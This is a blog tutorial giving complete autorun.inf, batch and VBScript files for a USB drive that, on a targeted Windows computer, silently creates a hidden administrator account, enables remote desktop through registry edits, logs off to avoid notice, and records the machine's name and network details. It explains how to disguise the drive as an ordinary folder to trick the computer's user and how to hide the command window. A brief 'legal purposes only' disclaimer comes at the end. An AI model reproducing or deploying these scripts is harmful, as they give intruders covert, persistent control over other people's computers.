Automated Admin Control from USB

by flyingpengwin

This Tutorial is to to teach a comprehensive use of autorun.inf and .bat combination to grant a user the ability to customize a series of files that will run automatically to grant the user complete admin control of a target computer.

Before continuing, I would like to state that this guide is not for gaining administrative password to a computer, this guide will assume that the user either has an administrative password or has access to an account that itself is administrative. The reason for this assumption is that 1. There are many many many guides on the net on how to get someone’s windows password. Google it. or 2. Most home users run under an administrator account which a password would then not be needed. And 3. This tutorial is not one for every single computer. Each time you target a computer you must modify your .bat files to be compatable with that computer.

How to create a Autorun.inf file and its applications
Basics of .bat files (only covering what is necessary for this tutorial)
How to create .bat files that will:
Create a new administrator account with remote desktop privelages
Activate Remote Desktop if not already enabled.(as well as the guide to do it manually though the Windows UI)
And to create a .txt file with a log of all the information you need of that computer.

Creating a Autorun.inf:
Autorun.inf are files that windows uses to recognize a device. It uses keys to tell the computer; the name of the device, what program or shortcut to recommend to run on start up, and the icon of the device.
(There are keys that the autorun.inf can do but will not be used in this tutorial. A full list of all keys for AutoRun can be found Here )
*Please Note that Autorun.inf restricted for USB drives has been disabled in Windows7. the “Open” and “Action” keys are no longer valid and will be ignored if used on a Win7 comp. Naming and Icon are still active so knowning how to create an Autorun.inf is still useful.(just not really for targeting a computer…)*

First start by creating a new .txt file (Start>All programs>Accessories>Notepad)
inside the text file type or copy and paste:

LABEL=Browse USB Folder

Obviously lables the device.
Automatically launches a pathway or file when the disk/usb device is inserted.
Obviously tells the computer what icon to give the device. (must be in .ico format) You can search for the folder.ico file, or create your own, just know if you create your own you can’t “trick” your target into opening up the .bat.
Is if, the computer has “Ask Me Everytime” enabled instead of having the default “open” key ran. (And example of “Ask Me Everytime” being enabled would be if you inserted an install disk and a window pops up prompting the user to choose what to do isntead of automatically running the setup.exe)
By labeling the usb “Brows USB Folder” and choosing an icon that looks like a folder. It mimic’s a usb device that has no Autorun.inf. This way if the target is the one connect the device, they will just click “Browse USB Files” like normal but it will launch your .bat file instead.
Now save this file as “autorun.inf” (no .txt at the end)

Second, We are now going to create a .bat file labeled “admin.bat” which corralates to our autorun.inf. .bat files are essentially a string of command prompt(cmd) files ran in sucession. Start by creating another new .txt file copy this into it:
*If the computer you are targeting is NOT logged into and administrator account but you know the administrator username and password.

@echo off
runas /user:admin %~d0\adduser.bat
shutown -l -f -t 01

@echo off
Tells the computer to not print “say” each line of commands, but to just print the output of each command.
Tells the cmd window to “Clear Screen” which will remove the “@echo off command”
Runas /user:admin %~d0\adduser.bat
Is the reason for this .bat command. It tells cmd to run a new .bat file under an administrator’s account “admin” here is used as the name of the target computer. You must know the password to the administrator account to processed past this point. After the correct password is typed a new cmd window will pop up and begin running the new .bat file. In this case, “adduser.bat”
shutdown -l -f -t 01 (or in windows Vista and < ) shutdown -l -f -t 001
is here so that the computer our targeting will logout automatically once the other bat command is ran. This will help with the whole “get in and get out with out being noticed”. If your not worried about this you can leave this part off. I also have this here so that when it logs you can now log in right away into your new account. Btw if the comp your at (say a library comp) is set to auto login to an account. Just hold down shift before it starts logging in and you will be able to login to another accoun.
Exits the .bat program

Next is the adduser.bat file needs to be created (or if you do not need to login to an admin account and are skipping the top .bat file, this will be called admin.bat)

@echo off
net user username Passw0rd /add
net localgroup Administrators username /add
net localgroup "Remote Desktop Users" username /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v username /t REG_DWORD /d 0 /f
mkdir %~d0\Documents\RemoteInfo\
echo Computer Name: %userdomain% > %~d0\Documents\RemoteInfo\%userdomain%.txt
echo User Account Used: %username% >> %~d0\Documents\RemoteInfo\%userdomain%.txt
echo User Account Created: username >> %~d0\Documents\RemoteInfo\%userdomain%.txt
date /t >> %~d0\Documents\RemoteInfo\%userdomain%.txt
time /t >> %~d0\Documents\RemoteInfo\%userdomain%.txt
ipconfig /all >> %~d0\Documents\RemoteInfo\%userdomain%.txt

net user username Passw0rd /add
Creates a new user named “username” with the password “Passw0rd”. If you want another name or passowrd change it. but make sure to change it everywhere. Also, Some computers have a requirement for the passwords. (not to mention you should have a password) So your better off just using a more difficult (upper, lower, and numbers atleast) password to ensure that your account is able to meet all requirements.
net localgroup Administrators username /add and net localgroup “Remote Desktop Users” username /add
Add the new “username” user to both the Administrator group and the remote desktop group.
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
Creates a Dword value called “fDenyTSConnections” with a value of 0. This enables remote desktop.
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList”/v username /t REG_DWORD /d 0 /f
This creates a new Dword value named the new user name. Because the value is 0. It hides the new user from the login screen.
mkdir %~d0\Documents\RemoteInfo\
Creates the director for the .txt file to be saved. If the directory is already created it skips this.
echo &etc & the rest of the .bat
The following commands creat a new .txt file in the name of the computer. The following .txt has the name of the computer, the user name you ran these .bat on, and the newly created account, the time and date, and the ip address of the computer.

Finally copy all these files to the root directory of the usb drive.

Annnddd… Thats it. Now when you plug in the usb and click the auto run program OR just open the usb up and run the .bat manually (if in win7 or later) and type in the admin password (if needed) and you will now have a new admin account that can remote desktop, all the info you need and have the account hidden from the user. If you never login to the account (remote desktop or otherwise) but just simply use it to run misc. programs as admin through cmd, (or other programs) the account will never have folders created. and the only way the user would know of the account is if they manually searched to see how many accounts were on the computer (not very likely at all for a common user).

Below are some nots add ons or things I felt I should mention and are worth reading.

1. “%~d0” in cmd means “the drive that the .bat file is located. Because usb drives letters vary in letter it is necessary to use variable names for the drive. (Same for %userdomain% for the computers name and %username% for the user name that is being ran.)

2. If you want to completely trick the user by using the autorun.inf. First add “start %~d0” at the beginning of the admin.bat file. This will cause the usb folder to run on start up. Then create a new .vbs file by opening up a new notepad and copy and past this into it:

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "%~d0\admin.bat" & Chr(34), 0
Set WshShell = Nothing

And save the file as “admin.vbs”

And then in the autorun.inf change “OPEN=admin.bat” and “ACTION=admin.bat” to “OPEN=admin.vbs” and “ACTION=admin.vbs”

What the .vbs files does is run the .bat files with out having the command prompt window pop up. Because the cmd window will not pop up AND because the whole point of using it this way is to trick a user into using it. This trick will only work when the admin.bat is ACTUALLY the “adduser.bat” with the admin.bat name (as discuessed above) It’s pointless to have the .vbs…. if you have to type an admin password infront of the target.

3. It should be known that issues with activating remote desktop this way. It will appear to be enabled but will actually be enabled. If this happens you must activate remote desktop in the usual way.
4. I will also mention, that this will NOT activate remote desktop on computers that do not feature it. All basic packages do not include it. This also includes Win7 home premium and home basic and other equivalents. But computers with Ultimate, Professional, Enterprise, or is a window server computer this should work.
5. To change username make sure all “usernames” are changed.(it might be in places you didn’t notice before.)
6. I could have just added a link to all the files aboved zipped together and all you would have to do is unzip it into a usb. But… that’s not the point. If you can’t follow these instructions then you really should not be using this.

I would also like to leave off with, This is to only be used for legal purposes. Tricks in good faith on friends is always fun. But I actualy use this legally everyday at work. Because all the computers we run are constantly logged in to a guest account, I’m able to enable everything I need to monitor and control the computers with out having to enable a bunch of things or write down all their information.



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s